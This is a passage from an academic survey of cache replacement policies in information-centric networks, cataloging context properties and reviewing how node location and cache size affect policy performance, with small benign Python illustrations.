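class ContentContext:        # "what"/"when": the content and its access history at a node
    name: str
    size: int
    request_count: int = 0
    last_access: float = 0.0

@dataclass
class NodeContext:           # "where" (node): the cache-enabled router storing the content
    cache_capacity: int
    betweenness: float = 0.0

@dataclass
class NetworkContext:        # "where" (network): topology and resource characteristics
    hops_to_producer: int = 0
    link_delay_ms: float = 0.0

@dataclass
class HumanContext:          # "who": the user requesting or publishing the content
    mobility_profile: str = "static"

@dataclass
class ContextView:           # the context of one cached content in one node of one network
    content: ContentContext
    node: NodeContext
    network: NetworkContext
    human: HumanContext = field(default_factory=HumanContext)
```

a replacement scheme can then be read, informally, as a function that ranks such views for eviction; the following subsections identify which of these dimensions each surveyed scheme actually uses.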
this article surveyed the impacts of different architecture decisions on the replacement schemes; however, the discussion of specific caching protocol properties is out of the scope of this work. rq : context characteristics our second research question aims at identifying the context characteristics directly related to the policies. to this end, we collected the types of information used as input data for the replacement schemes and classified the corresponding properties for the main context dimensions of fig. . we further discuss the context characteristics as follows:
- the content dimension is subcategorized into four types of properties: feature, popularity, time-related, and type-specific. the feature properties are global ones, that is, they are inherent to the content and usually do not vary according to the other context dimensions. conversely, popularity and time-related properties are related to the node caching the content, and consequently, their values differ from node to node. the type-specific subcategory is reserved for specifying singular aspects of data or application types. figure contains a list of properties extracted from the surveyed articles for the content dimension. in this case, the type-specific properties are mainly about video content, for illustrative purposes.
- the node dimension is subcategorized into resource, connectivity, location, content-related, and traffic properties. accordingly, the resource properties are inherent to the node; connectivity and location features are mostly related to neighbor nodes and the position of the node in the topology. the content-related subcategory represents the intersection with the content dimension and gathers content information at a broader granularity. the traffic properties are related to the flows of data traffic passing through the node. figure shows the list of properties extracted from the surveyed articles for the node dimension.
- the network dimension represents properties common to general network types. the properties are categorized into four classes: resource, topology, traffic, and time-related. the resource class groups the overall network capabilities, such as bandwidth, link capacity, and content fetching costs. the topology properties are more specific to the network's size, represented mainly by the distances between nodes. the traffic class has the same connotation as in the node dimension but differs in granularity, and the time-related class defines temporal properties. the properties in the time-related class are similar to some of the topology properties: they relate the distance between nodes measured in time units to reflect the delay to retrieve content. figure presents the list of properties extracted from the surveyed articles for the network dimension.
the previous list of properties is a broad definition of context characteristics to assist in the analysis of cache replacement schemes. it helps to visualize what dimensions are directly related to the policies and could significantly impact the applied network context. however, it is not a static list and can be extended as new information becomes available and relevant to a specific icn instance. furthermore, some of those properties are closely related to more than one context dimension, and it is possible to change their classification perspective to represent a given icn context.
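as a concrete example of a node-location property used by some of the surveyed schemes (betweenness centrality, discussed further in the results), the value can be derived directly from the topology; the sketch below assumes the networkx library is available and uses an arbitrary toy topology:

```python
import networkx as nx

g = nx.Graph()
g.add_edges_from([("consumer", "cr1"), ("cr1", "cr2"), ("cr2", "cr3"),
                  ("cr2", "cr4"), ("cr3", "producer"), ("cr4", "producer")])

# nodes lying on many shortest paths (here cr2) obtain higher scores; location-aware
# schemes can use such a rank to treat core and edge routers differently
centrality = nx.betweenness_centrality(g)
print(sorted(centrality.items(), key=lambda kv: -kv[1])[:3])
```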
moreover, the unified view of properties can substantiate the design of novel cache solutions by helping to identify potential gaps for new situations. the human dimension is an emergent and new approach to be explored as part of the context. recent research fields like people-centric networking (conti et al., ) and human-centric multimedia networking (rosário et al., ) are gathering attention to the basic fact that users play an essential role in demanding contents or network services, and different human characteristics can lead to different impacts on the network. in this way, human attributes are potential drivers in the design of network solutions. the many examples of human data, such as behaviors, interests, personality, character, social interactions, humor, daily routines, gender, age, etc., opens up a range of possibilities to be explored. pires et al. ( ) performed experiments with real user data and associated distinct user habits with different cache replacement policies. the work reinforces the relevance of the human dimension for network configuration. however, it is an incipient research field, and there is still a lack of studies intersecting human features with caching policies. thus, it was unsuitable for proposing a proper classification of properties for the human dimension in the current research. moreover, although some policies intended to incorporate features related to the user in the caching process (al-turjman, al-fagih & hassanein, ; xing et al., ; zhang, tan & li, ), the human characteristics are not directly used by the policies. for instance, wei et al. ( ) proposed a mobility-aware caching strategy for mobile networks in which they model the transition of users among wifi access points as a stationary markov model. in a broad sense, the user’s mobility has the same connotation as the node’s mobility. in the surveyed works that deal with mobility, the concept of a node’s mobility suits the objectives since the human dimension is not directly associated with mobility patterns. different user’s profiles can be associated with different mobility patterns, for example, different ages or professions (liang et al., ) or even different personalities (chorley et al., ). pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ rq : cache replacement schemes for icns the literature shows various proposed replacement schemes for icns exploring beyond the context of the content and adding properties of node and network’s dimensions. in this direction, we cataloged the replacement schemes applied to the surveyed articles to figure the hierarchy of context dimensions identified from the surveyed articles and the proposed classification for the correspondent characteristics associated with the cache replacement schemes. full-size doi: . /peerj-cs. /fig- content popularityfeature time-related type-specific - chunk/content size - chunk sequence number - content prefix name - chunk/content type - chunk/content priority - chunk/content category - chunk/content provider identification - chunk/content monetary cost - content's additional features (e.g., the type of multimedia, the style, the theme, the popularity before officially released, the aiming group, the cost, the place of origin, etc.) 
- chunk/content hit count - chunk/content request count - chunk/content category request count - chunk/content popularity degree (given and calculated by a content provider) - chunk/content initial popularity value (defined by content provider) - number of requests for neighboring chunks in a same content - chunk/content last access time - chunk/content penultimate access time - chunk/content requests arrival time - chunk/content average request arrival time - time when request for a chunk/content is satisfied (node response) - time when a chunk/content was written in the memory - time when a chunk/content request count is calculated - chunk/content creation time on producer - chunk/content expiration time - chunk/content maximum expiration time - counter which shows the recency of a chunk/content in the cache - video segment resolution level (video quality) - request count by video segment resolution level - weight value for each layer of encoded svc video packet (layers = video bitrate = quality) - for mpeg video: number of frames between two consecutive i-frames (called group of picture - gop) - for mpeg video: number of gops needed in a receiver to start playing. - for video with coding standards following network abstraction layer (nal): nal unit data type figure properties from content dimension extracted from the cache replacement schemes for icns. full-size doi: . /peerj-cs. /fig- pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ collect context features and understand their correlations. to better readability, we classified the schemes according to the classes of context information they used. they are classified in: content-based; content and network-based; content and node-based; content, network and node-based; and network and/or node-based schemes. tables – contain the lists of the cache replacement schemes in each class, respectively. the tables also detail the correspondent context property categories used by the policies, which reveal the diversity of context combinations explored in the literature. we grouped the policies accordingly. 
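to illustrate what a scheme from the content and network-based class looks like in practice, the sketch below is an invented toy rule (not one of the cataloged policies; the weights are arbitrary) that scores cached items by a content property (request count), a time-related property (recency), and a network property (hop count to the producer), and evicts the lowest-scoring one:

```python
import time

def eviction_victim(cache_meta, w_pop=1.0, w_rec=1.0, w_hops=0.5):
    """cache_meta: name -> {'requests', 'last_access', 'hops_to_producer'}"""
    now = time.time()
    def score(meta):
        recency = 1.0 / (1.0 + now - meta["last_access"])       # time-related (content)
        return (w_pop * meta["requests"]                         # popularity (content)
                + w_rec * recency
                + w_hops * meta["hops_to_producer"])             # topology (network)
    return min(cache_meta, key=lambda name: score(cache_meta[name]))

cache_meta = {
    "/a/1": {"requests": 12, "last_access": time.time() - 5,  "hops_to_producer": 2},
    "/b/7": {"requests": 1,  "last_access": time.time() - 90, "hops_to_producer": 6},
}
print(eviction_victim(cache_meta))   # "/b/7": rarely requested and stale, despite being farther away
```

keeping items that are popular, recently used, or expensive to refetch is the common intuition behind most of the combinations listed in the tables that follow.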
this classification provides a comprehensive view of what context node connectivityresource location content-related - cs cache capacity - number of interfaces - general cost of locally serving a chunk - storage energy consumed to store a chunk - memory slot number - pit interest-packet timeout - one-hop neighbor nodes - status of cache capacity of its one-hop neighbor nodes - number of occurrences of a content within the one-hop neighborhood - information of the content with the lowest popularity from one- hop neighbors nodes - number of neighbor nodes which requested a content - mobility pattern - location of the node into the topology - node betweenness centrality (the number of times a specific node lies on the content delivery paths between all pairs of nodes in a network topology) - reachability of a node (as a function of the number of nodes between any two nodes) - node´s general rank according to topology position (either assigned arbitrarily or based on some metric such as betweenness centrality, closeness centrality, or node degree) - number of contents - number of content video titles - number of chunks by content - number of chunks by content video titles - number of chunks by producer - number of chunks by category - number of contents by prefix name portion - maximum chunk resquest rate (know at the node at any instant of time) - minimum chunk request rate (predefined minimum popularity threshold value to be cached) - interface of incoming request for a chunk - number of interfaces saved in the pit entry for a chunk traffic - number of flows (active downloads) currently passing over each of the node interfaces - total request rate - number of broadcasted video frames per second; figure properties from node dimension extracted from the cache replacement schemes for icns.full-size doi: . /peerj-cs. /fig- network resourcetopology traffic time-related - distance / hop count from the node to the content producer - distance / hop count from the node to the next node caching the content; or the content producer - distance / hop count from the node to the consumer - maximun hop count possible from the node to a content producer - euclidean distance from the node to the content producer - number of nodes - link capacity - ling general cost - bandwidth consumed in downloading a chunk - energy cost of fetching a chunk from other caches or the source - energy cost for wireless transmission a chunk from an access point to the requester user equipment - general cost of fetching a chunk from the nearest neigbor - general cost of fetching a chunk from the content producer - general cost of transferring a chunk across two nodes - the max cache capacity within a sub-network - total request rate for all chunks being requested by all nodes - total request rate for a chunk being requested by all nodes - number of users - network delay for retrieving a content - maximum delay for retrieving a content figure properties from network dimension extracted from the cache replacement schemes for icns. full-size doi: . /peerj-cs. /fig- pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table content-based cache replacement schemes. content property categories replacement schemes popularity rossi & rossini ( ), chao et al. ( ), ran et al. ( ), yeh et al. ( ), nakayama, ata & oka ( ), liu, zhu & ma ( ), zhao et al. ( ), kalghoum & gammar ( ), sinky et al. 
( ), li, yu & li ( ), kalghoum & saidane ( ) time-related ravi, ramanathan & sivalingam ( ), li, ma & hu ( a), rezazad & tay ( ), rhaiem, fourati & ajib ( ), shukla & abouzeid ( ), dhiab et al. ( ), vural et al. ( ), hou et al. ( ), meddeb et al. ( ), din et al. ( ) popularity and time-related wang et al. ( a), neves dos santos et al. ( ), qian et al. ( ), chen et al. ( ), abidi & gammar ( ), xin et al. ( ), yao et al. ( ), chootong & thaenthong ( ), zhang, tan & li ( ), huang et al. ( ), tang et al. ( ) popularity, time-related and feature kang, lee & ko ( ), bilal & kang ( ), han et al. ( ), bilal & kang ( ), sri prakash & moharir ( ), sertbaş et al. ( ) time-related and feature thomas & xylomenos ( ), rao, schelen & lindgren ( ), wu et al. ( ), tarnoi et al. ( ) popularity and feature chandrasekaran, wang & tafazolli ( ), chandrasekaran et al. ( ), lee & hong ( ) popularity and type-specific jia et al. ( ), ge et al. ( ) time-related and type-specific zhang et al. ( c) time-related, type-specific and feature ghahfarokhi, moghim & eftekhari ( ) type-specific and feature lee, lim & yoo ( ) popularity, time-related, type- specific and feature lee, lim & yoo ( ) table content and node-based cache replacement schemes. content property categories node property categories replacement schemes popularity location wei et al. ( ), chen et al. ( ), mick, tourani & misra ( ), lal & kumar ( ) content-related lal & kumar ( ), zhang, tan & li ( b), baugh & guo ( ) traffic saltarin et al. ( ) traffic and connectivity yang & choi ( ) traffic and location liu et al. ( b) popularity and time-related traffic karami & guerrero-zapata ( ), rocha et al. ( ), zhou & ye ( ), khan & khan ( ), qu et al. ( ) connectivity an & luo ( ) content-related and traffic yao et al. ( ) time-related and feature content-related hahm et al. ( ) connectivity and location aoki & shigeyasu ( ) popularity, time-related and feature connectivity wood et al. ( ) content-related and traffic ong et al. ( ) popularity and feature content-related li et al. ( b), dron et al. ( ) pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table content and network-based cache replacement schemes. content property categories network property categories replacement schemes popularity topology wang et al. ( ), wang, bi & wu ( b), ming, xu & wang ( ), ren et al. ( ), hu et al. ( ), huang et al. ( ), khan et al. ( ) resource caarls, hargreaves & menasché ( ) traffic and time- related sinky et al. ( ) popularity and time- related topology chen, fan & yin ( ), ostrovskaya et al. ( ) time-related yokota et al. ( ) resource pal & kant ( ) popularity and feature resource wang, bayhan & kangasharju ( ) time-related sun & wang ( ) resource and time-related ndikumana et al. ( ) popularity, time- related and feature topology duan et al. ( ) time-related time-related dai et al. ( ) feature resource xing et al. ( ) table content, node, and network-based cache replacement schemes. content property categories node property categories network property categories replacement schemes popularity and feature content-related and location topology panigrahi et al. ( ) content-related and traffic traffic liu et al. ( ) traffic resource badov et al. ( ) resource time-related and resource gür ( ) popularity and time-related content-related topology rath, panigrahi & simha ( ) traffic and location topology and time-related al-turjman, al-fagih & hassanein ( ) popularity traffic topology chen et al. 
( ) connectivity topology and resource zhang et al. ( ) time-related resource topology and resource llorca et al. ( ) location topology naz, rais & qayyum ( ) popularity, time-related and feature traffic topology and time-related al-turjman ( ) table node and/or network-based cache replacement schemes. node property categories network property categories replacement schemes content-related and location topology wang & bensaou ( a, b), yanuar & manaf ( ) content-related and resource time-related sureshjani & moghim ( ) resource resource wang et al. ( a) – resource ioannidis & yeh ( , ) pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ information the techniques required. therefore, it is the first guide to map which context variances could directly influence the performance of the technique. the content-based replacement policies explore only the characteristics of the content to make the eviction decision. they use one or more of the content features listed in fig. . following this reasoning, the policies that explore beyond the content and start to look to characteristics of the node or the network that could lead the eviction process to make a better decision are classified accordingly. they also use one or more features listed in fig. or fig. . naturally, almost all the schemes further explore the content dimension; however, we also found methods dealing only with network and node features to assist the eviction process. figure illustrates the usage distribution of context properties by their categories. we ranked the context categories according to the number of policies that used one or more of the corresponding category properties. after content popularity, time-related and feature properties, the network topology and node traffic properties are the most used ones. it is important to remark that for the classification of policies, we did not account for the general use of node cs cache capacity and the number of interface information, since it can usually be part of the caching process. rq : effects of context variation our objective in this section is to carry out an evidence-based analysis and identify what context dimensions can affect the policies’ performance. an evidence-based analysis can increment and drive approximate solutions to the problem of finding the optimal policy. the choice of a best-fitting replacement policy exponentially grows in complexity when there is a diversity of context variables. many efforts have been employed to comparatively evaluate different policies in different network scenarios. usually, the evaluations comprises variations of context like cache size, topology, or content popularity. the results gives us approximations and insights about which policy performs better in the evaluated scenarios or which variations in context can impact the policy’s decisions. such information is essential to help the process of network design when deciding which content - popularity content - time-related content - feature network - topology node - traffic node - content-related node - location network - resource network - time-related content - type-specific node - connectivity node - resource network - traffic figure distribution of context properties categories according to the number of policies that used the correspondent properties in their eviction logic. full-size doi: . /peerj-cs. /fig- pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
/fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ replacement policy should be instantiated in a given network scenario. in this way, we collected reported evidence from the surveyed articles about the effects of context variations on replacement schemes’ performance. we have found policy comparisons in different scenarios with variations of many aspects like request rates, forwarding strategies, number of consumers, number of contents, and overall topology. nevertheless, in summary, we found that variations in the node location, cache size, cache placement policy and content popularity had some relevant effect on the policies’ performance. the first three presented variations resulting in different choices of replacement policies. also, beyond the impact on the choosing point of which cache replacement schemes to apply, variations in cache size and content popularity presented other relevant effects related to the policies’ performance. we discuss the context variations separately in the following. to support the reading, table presents a description of the policies reported in this section. node: location the works from wang & bensaou ( a), tarnoi et al. ( ), gallo et al. ( ), li, simon & gravey ( ) and newberry & zhang ( ) presented evidence of the impact of node’s location on cache replacement scheme choice. table summarizes the characteristics of the scenarios that supported the analyses. in the following, we discuss the reported impacts: � wang & bensaou ( a) proposed two complementary replacement algorithms to handle different workload characteristics observed by both edge and intermediate router nodes. the eviction logic uses the hop count factor to prioritize the maintenance of more distant contents and, consequently, reduce network resource consumption. besides the hop count, the replacement algorithm for intermediate nodes considers the number of node’s interfaces saved in the pit entry for a content to estimate the diversity of the content requests. the proposed solution outperforms homogeneous configuration with lce + lru, and the results emphasize the benefits of using heterogeneous replacement policies according to the location of the node into the topology. however, the eviction solutions were evaluated only in conjunction with a proposed placement policy named ppc, limiting the analysis of the heterogeneous eviction solution separately. the proposed replacement schemes logic would be able to work together with other location policies, like lce. � li, simon & gravey ( ) used the lrfu policy with a weighting parameter y to represent a multi-policy caching where every content router implements its caching policy according to its location in the network. the lrfu behavior can switch to be more closely similar to lru or lfu according to the value of y. the router location is relative to his position between users and servers. the routers (crs) are classified according to a defined “entering degree”, which represents the number of the shortest path connecting front-end crs with servers via a cr. the reasoning to configure different values of lrfu parameter y comes from an experiment under an emulated european backbone ebone topology with nodes, in which they performed experiments with homogeneous configurations of y in all routers. they observed that the pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ routers with lower hit rate achieved their best performance with higher values of y, and on the contrary, routers with higher hit rates achieved their best performance with lower values of y. allied to that, they also observed that the position of the router in the hit rate rank is directly proportional to his position in the topology, in the sense that the closer to the edge, the higher is the hit ratio performance. � the experiments of tarnoi et al. ( ) reveal the difference of performances between lru and random according to the node position. for the experiment with a cascade network scenario and one content requester, lru and random, in combination with lce placement policy, interchange positions on the rank of the cache hit performance: for the level , lru outperforms random, but from level onward, lru performance decreases drastically and random also slightly decreases but now with better performance than lru. the difference in the rank of cache hit rate is similar for the scenario variation with multiple content requests, but lru and random interchange position after the third level node. for the internet topology, the result groups edge and core nodes, and again, lru presented the best results for edge nodes while random for core nodes. � continuing the discussion about lru and random replacement policies, gallo et al. ( ) came to a similar conclusion in terms of the difference in performance when varying node locations. for that, the authors presented an analysis of cache miss probability depending on the content popularity distribution. the analysis suggest that lru and random have significantly different performances only for popularity distributions highly concentrated on a relatively small number of objects. that difference is also relative to the position of the node in the topology. the more popular objects are more likely to be found at the edge node when using lru, but those more popular objects can be more evenly distributed when using random across the path. also, the evaluation presents heterogeneous configuration for the leaves and root levels of a tree topology: lru-random and random-lru, also lru-lru and random- random. the heterogeneous lru-random configuration achieved better performance than the other configuration options, that is, lru and random configured respectively in the edge and intermediate levels. � while evaluating the advantages of integrating big data applications in an icn-like architecture, newberry & zhang ( ) argue the benefits of using different cache replacement policies at each layer of a data center fat-tree topology. they compared the performance of homogeneous and heterogeneous policy configurations, placing the cache in each node of a fat-tree topology with three layers, composed of core, aggregation, and edge switches. they performed combinations of the policies lru, q, arc, lirs, and mq, on the levels of the tree topology, totaling combinations for each variation of cache size. the results could reveal the different behaviors at different layers of the topology and the suitability of different policies at each level. however, the gain of the reported best heterogeneous configurations concerning the best homogeneous configuration is not explicit in the article. pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table set of content placement and replacement policies. abbrev. 
policy name type description references lru least recently used replacement removes the last accessed content in the cache – lfu least frequently used replacement removes the last frequently used content in the cache – fifo first-in-first-out replacement removes the oldest content placed in the cache – – random replacement removes one content randomly – – size replacement removes the content with largest size in the cache abrams et al. ( ) lrfu least recently/frequently used replacement considers the recency and frequency of contents to compute a combined recency and frequency (crf) metric. crf values are higher for more recent and frequent contents. the policy evicts contents with lower crfs lee et al. ( ) fcdc fast convergence caching replacement algorithm based on dynamic classification method replacement considers categories of contents by content’s popularity and a popularity rank by categories. contents in lower ranked categories can be evicted for ones in higher ranked categories chao et al. ( ) ruf recent usage frequency replacement considers categories of contents by similarity and a popularity rank by categories. contents in lower ranked categories can be evicted for ones in higher ranked categories kang, lee & ko ( ) ev energy efficiency cache scheme based on virtual round trip time placement/ replacement considers the energy consumption to store and to transport the content. places the contents with storage energy smaller than their transport energy, and compares the energy saving of the cached contents with the energy saving of the passing content to evict the contents wang et al. ( a) pbrs content-popularity and betweenness based replacement scheme replacement removes the content with the lower popularity. computes the content popularity based on the content’s requests and node’s betweenness centrality liu et al. ( b) abc age-based cooperation replacement removes the content based on content’s time-to-live (ttl). computes ttl based on the node’s location in the topology and the content popularity. the closer to the edge and/or the more popular a content, the longer its ttl value. also called ttl ming, xu & wang ( ) q two queues replacement designed for buffer management, it considers two lists of pages. the first list applies fifo in the incoming page requests. the second list receives the pages in the first list requested again and their subsequent requests and applies lru johnson & shasha ( ) arc adaptive replacement cache replacement designed for buffer management, it considers two lru lists. the first list contains pages requested once in a recent time, and the second list pages requested at least twice. the policy adaptively decides the number of pages to maintain in each list according to the workload characteristic megiddo & modha ( ) lirs low inter-reference recency set replacement designed for buffer management, it considers the number of other pages accessed between the last and penultimate access for a page as inter-reference recency (irr) metric. the policy removes the page with the largest irr jiang & zhang ( ) mq multi-queue replacement designed for buffer management, it considers multiple lists with different access frequencies for different periods zhou, philbin & li ( ) ppc popularity prediction caching replacement designed for video content. predicts and caches the future most popular videos’ chunks based on the number of requests for neighboring chunks in the same video content. 
evicts chunks with the least future popularity zhang, tan & li ( ) (continued) pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ all the scenarios discussed in this subsection concluded that heterogeneous policy configurations achieved the highest performances than the homogeneous configurations. whether for small topologies (tarnoi et al., ; gallo et al., ) or larger topologies (wang & bensaou, a; li, simon & gravey, ; tarnoi et al., ; newberry & zhang, ), the works observed different traffic characteristics in the different nodes. they attributed this difference to the node position and associated different policies to different traffic profiles. multiple levels of caches naturally present that difference in traffic characteristics by cache-level due to the knowing filtering-effect. the filtering-effect happens any time a lower-level cache hits a content request. the cache does not propagate that request to the rest of the network and propagates only the miss requests to upper-level caches. this behavior modifies the original characteristics of the traffic. many studies have been addressing the progressive filtering effect in hierarchical web caches (williamson, ; zhou et al., ; melazzi et al., ). that filtering has a direct impact on the temporal locality of the requests (jin & bestavros, ). temporal locality refers to the property that recently accessed objects are likely to be reaccessed in the near future. as cache levels table (continued) abbrev. policy name type description references ccp cache policy based on content popularity replacement considers previous content popularity and the number of hits in a current interval of time to compute the current content popularity. the policy evicts less popular content ran et al. ( ) betw betweenness centrality placement considers the node’s position at the topology in terms of node’s centrality measures to place the content. only selected nodes with higher measures cache the content. also called leave- copy-betw (lcb), or centrality chai et al. ( ) lcd leave copy down placement places the content only in the immediate downstream node of a cache-hit point laoutaris, syntila & stavrakakis ( ) lce leave copy everywhere placement places the contents in all caches along the reverse path of the content request laoutaris, syntila & stavrakakis ( ) prob probabilistic caching placement each cache in the reverse path of the content request stores the content with a constant probability p. also called leave- copy-probabilistically (lcp) laoutaris, syntila & stavrakakis ( ) – probcache placement considers the shared storage capacity of the request path and the node’s distance to the content producer to calculate the node’s probability of caching the content; also called pprob psaras, chai & pavlou ( ) – crcache placement considers the content popularity and the node’s centrality measures to calculate the probability of caching the content. the most popular contents are cached in the nodes with the highest centrality. also called cross wang et al. ( b) pcp progressive caching policy placement considers the immediate downstream node of a cache-hit point to store the content, the number of interfaces saved in pit entry for the intermediate nodes, and the number of requests for edge nodes wang & bensaou ( a) rand single node random caching placement places the contents in one random intermediate node along the delivery path eum et al. ( ) pires et al. ( ), peerj comput. sci., doi . 
/peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ filter requests, the temporal locality intensity becomes gradually weakening, and the traffic profile at upper-level caches becomes more random (jin & bestavros, ). that explains why random policy achieved better performances for intermediate nodes in some of the discussed scenarios. as expected, workloads with temporal locality property have a strong correlation with caching policies (garetto, leonardi & martina, ), and variations in the temporal locality patterns directly impact the variations of caching policies performances. regarding the context attributes explored by the replacement schemes, only two of the works presented evaluations including context features in the eviction logic that helped differentiate the node’s position: like the node’s number of interfaces (wang & bensaou, a) and the node degree as a general rank according to the topology (li, simon & gravey, ). however, other works are exploring those, and other context attributes that could be helpful. the context attributes with their respective classification and reference works are: � node-location: node betweenness centrality (chen et al., ; liu et al., b); � node-location: reachability of a node (panigrahi et al., ); � node-location: node’s general rank according to topology position (mick, tourani & misra, ; aoki & shigeyasu, ; naz, rais & qayyum, ); � node-content-related: number of interfaces saved in pit entry for a chunk (wang & bensaou, a); � node-connectivity: one-hop neighbor nodes (zhang et al., ); � node-resource: number of interfaces (wang & bensaou, a; baugh & guo, ). although the node’s location is a context that should be considered when selecting a replacement policy, it is not easy to foresee a straight map between policies and node positions. first, because there are many policies and diversity of topologies with different requirements, but mostly because there are other contextual factors that can also impact the performance of the policies. as we continue to show in the next sections, this slr was able to pinpoint some of these factors. node: cache size the works from chao et al. ( ), wang et al. ( a), sun et al. ( ), newberry & zhang ( ) and liu et al. ( b) contains evidence of cache size variations on the performance ranking variations of cache replacement policies. table summarizes the characteristics of the corresponding scenarios. in the following, we discuss the reported impacts: � according to sun et al. ( ), the replacement scheme’s optimal choice depends on the cache size and the placement policy. the authors combined seven placement policies with five replacement policies: lru, lfu, fifo, ttl, size - and cache size variations of . %, . %, . %, and . % of the unique contents. the content routers have homogeneous cache sizes for all experiments. we observe that the most significant impact on the replacement scheme choice happens when passing from . % to pires et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ . % of cache sizes. that is, for all combinations of placement policies, the best choice of replacement scheme changed when the cache size moved from . % to . %. meanwhile, for most combinations of placement policies, the experiments running with . %, . %, and . % of cache sizes presented their highest performance values with the same replacement policy. for example, combined with lce, lru and ttl achieved the highest performances for . 
- chao et al. ( ) also show evidence that variations in cache size can lead to variations in the policy with the best performance. this work presents a content-based replacement policy named fcdc that manages the content popularity property (request count) to classify and replace contents according to popularity categories. the evaluation compares the proposed scheme against the lru and ruf policies. according to the results, fcdc presents a better cache hit rate than lru and ruf when the cache memory is less than %, yet the performance rank changed for cache sizes larger than %, and lru performed slightly better than fcdc. the authors attribute this behavior to each policy's properties: fcdc can keep track of content popularity and maintain the most popular content better than lru for small cache sizes, while lru prioritizes the most recently accessed content over the most accessed and popular content. however, this does not directly explain the performance differences across cache sizes, since fcdc deals with dynamic changes of content popularity and does not directly rely on node information.
- furthermore, the experiments performed by wang et al. ( a) also reveal differences in the policy performance rank while varying the cache size. the work proposes the ev policy, a node-based replacement scheme coupled with a placement scheme. ev was evaluated against lce + lru and lce + popu, a reference popularity-based policy. the configuration of the content popularity follows a zipf distribution, and besides the impact of different cache sizes, the results also reveal a correlation with the popularity skewness factor. for a skewness factor α equal to . , ev and popu had similar performances for all cache size variations. meanwhile, for α = . or . , the policies interchanged positions in the rank of average total energy consumption for different cache sizes: popu achieved better performance than ev for cache sizes between % and % of the total contents, while for larger cache sizes ev turns out to be the better choice. the work does not provide an analysis of this effect. the results show the impact of cache size on placement and replacement schemes together, which limits the evidence regarding the eviction scheme alone.
- similarly, liu et al. ( b) presented evidence of variations in the hit-ratio rank of the policies for different cache sizes. the work evaluates a proposed replacement policy named pbrs against lru, lfu, and fifo. pbrs and lfu interchange positions for different cache sizes in a tree topology. this effect is most evident for intermediate nodes, in which lfu presented better results for cache sizes between mb and approximately mb, and pbrs presented better cache hit values for larger cache sizes. both policies rely on content popularity, but lfu computes the popularity directly by counting the number of requests, while pbrs increments the computation by adding different weights associated with the nodes.
- finally, besides the effect of heterogeneous policies for different node locations in a fat-tree topology observed by newberry & zhang ( ), we also observed variations in the rank of policy performances while varying cache sizes. the work evaluated lru and other replacement policies named q, arc, lirs, and mq. for a homogeneous policy configuration in all levels of the topology, the rank of policy performances did not change when using cache sizes from to mb. however, when the cache sizes varied from mb to gb, a couple of changes happened in the rank: first, lru and q interchanged positions, in which q achieved better results than lru up to mb, but lru presented better results for gb; second, arc and mq changed positions, with mq presenting better results up to mb and arc with gb; and finally, lirs and arc also changed positions in the rank, with lirs presenting better results than all other policies up to mb, but arc achieving better performance with gb of cache size. for a heterogeneous policy configuration, the results presented similar effects on the rank. without going into the specific characteristics of the policies, this work provides evidence of the influence of cache size and of the lack of explicit patterns associating the performance of cache policies with the size of the cache. a toy comparison in this spirit is sketched right after this list.
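the kind of comparison these works run can be reproduced in a few lines. the sketch below is our own toy experiment, not the setup of any cited paper: it measures the hit ratio of lru and lfu on the same synthetic zipf request trace for a few cache sizes, which makes it easy to see how the gap between the two policies changes with the cache size (and tends to shrink as the cache grows). the catalog size, skew factor, and cache sizes are arbitrary assumptions.

import random
from collections import OrderedDict, Counter

def simulate(policy, cache_size, requests):
    """return the hit ratio of a single cache running 'lru' or 'lfu'."""
    cache = OrderedDict()   # insertion/recency order for lru; membership for lfu
    freq = Counter()        # request counts observed so far (lfu score)
    hits = 0
    for obj in requests:
        freq[obj] += 1
        if obj in cache:
            hits += 1
            if policy == "lru":
                cache.move_to_end(obj)
            continue
        cache[obj] = True
        if len(cache) > cache_size:
            if policy == "lru":
                cache.popitem(last=False)                  # evict least recently used
            else:
                victim = min(cache, key=lambda o: freq[o])  # evict least requested
                del cache[victim]
    return hits / len(requests)

rng = random.Random(7)
n_objects, alpha = 2000, 0.9
weights = [1.0 / (i ** alpha) for i in range(1, n_objects + 1)]
requests = rng.choices(range(n_objects), weights=weights, k=50_000)
for cache_size in (20, 200, 1000):
    print(cache_size,
          "lru", round(simulate("lru", cache_size, requests), 3),
          "lfu", round(simulate("lfu", cache_size, requests), 3))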
regarding the impact on the replacement policy choice, in none of the presented works is it evident why variations in cache size led to different policy choices. also, the analysis of the works together does not reveal potential patterns, due to the heterogeneity of the scenario factors. the scenarios range from a country-wide router-level topology with around k routers to a small and straightforward linear topology, with variations of placement and replacement policies and different ranges of cache size evaluations. although the evidence clearly shows the relevance of cache size in particular scenarios, it is not sufficiently conclusive as to why. yet, we cataloged other effects concerning variations in the cache size and the performance of the policies.

